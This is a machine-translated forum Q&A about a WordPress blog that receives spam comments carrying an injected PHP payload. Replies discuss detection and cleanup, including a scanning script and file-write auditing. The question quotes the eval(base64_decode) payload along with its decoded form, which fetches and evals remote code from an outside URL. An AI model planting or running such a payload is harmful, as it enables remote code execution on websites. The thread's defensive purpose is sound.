今天我使用wordpress博客,我收到了類似這樣的評論。Eval Base64病毒Wordpress
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
當我用解碼器解碼此評論,我得到
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
我收到很多這樣的評論。任何人都可以幫助我解決這個問題。?它是一個黑客還是它表明黑客的開始?
我正在尋找一個好的和快速的解決方案。這將幫助您找到哪些文件感染了eval64。然後,您可以在Dreamweaver中使用搜索/替換,並一次從所有文件中刪除它。
BUT
有短2行的代碼的索引文件。這2條線反覆注入eval。我不應該忘記的index.php它不過看在文件夾中:
嘗試搜索在使用Dreamweaver文件的MD5 。
希望你能解決它。
這是一次黑客或至少一次嘗試。他們正在利用一個未解決的wordpress漏洞,可以讓他們下載和執行代碼。這種攻擊目前在網絡上的公開曝光很少,如果它來源於受過良好教育的來源,可能會特別討厭。如果你在服務器端注意到這些類型的代碼片段,那麼請做更多的研究,以確定你是否真的感染了病毒,如果是這樣,感染實際上到了什麼程度。我已經看到整個共享主機服務器感染個別WordPress的網站管理員或允許通過無知或積極幫助這個問題傳播。不幸的是,這個特定的問題目前在網絡上沒有很好的記錄,所以你可能需要做一些研究,以確保你的網站是好的。爲了幫助你研究,我會澄清這個黑客的術語。
這是一個PHP代碼注入最有可能試圖利用wordpress框架中已知漏洞的攻擊。它使用Base64編碼的PHP代碼通過eval()注入自己的託管服務器,這是一種編程語言結構,幾乎包括所有的編程語言,包括PHP。具有極其有組織性和先進能力的黑客最近利用這個漏洞,在受到威脅的WordPress網站上造成絕對的破壞,因此在處理這類問題時要格外小心。
沒有任何建議爲我們工作。以下是我們如何從多個WordPress網站中刪除惡意代碼而無需任何停機時間。
我們遇到了一個問題,那就是我們有多個遺留的wordpress站點共享一個被這個病毒滲透的文件系統。
我們最終編寫了一個小python腳本來遍歷我們的文件系統並檢測惡意代碼。
下面是任何有興趣的代碼(注:AT風險自負): https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
的腳本將掃描的文件系統中的惡意內容,並作爲一個獨立的命令,它會嘗試刪除的base64 EVAL功能。
這實在是一個臨時解決方案,因爲此病毒的生成器使用PHP註釋導致正則表達式不匹配。我們結束了使用auditd要監視的文件寫入,我們知道在受感染文件:http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
一旦我們發現了病毒的產生,確實多了一個eval_scrubber remove,然後我們的問題是固定的。
最早備份您的數據 – swapnesh
這看起來像是一次黑客攻擊,但如果您使用標準的Wordpress主題和評論系統,那麼您應該沒問題 - 您的服務器可能不會執行該PHP。你有什麼理由相信它實際上正在你的服務器上運行嗎? – halfer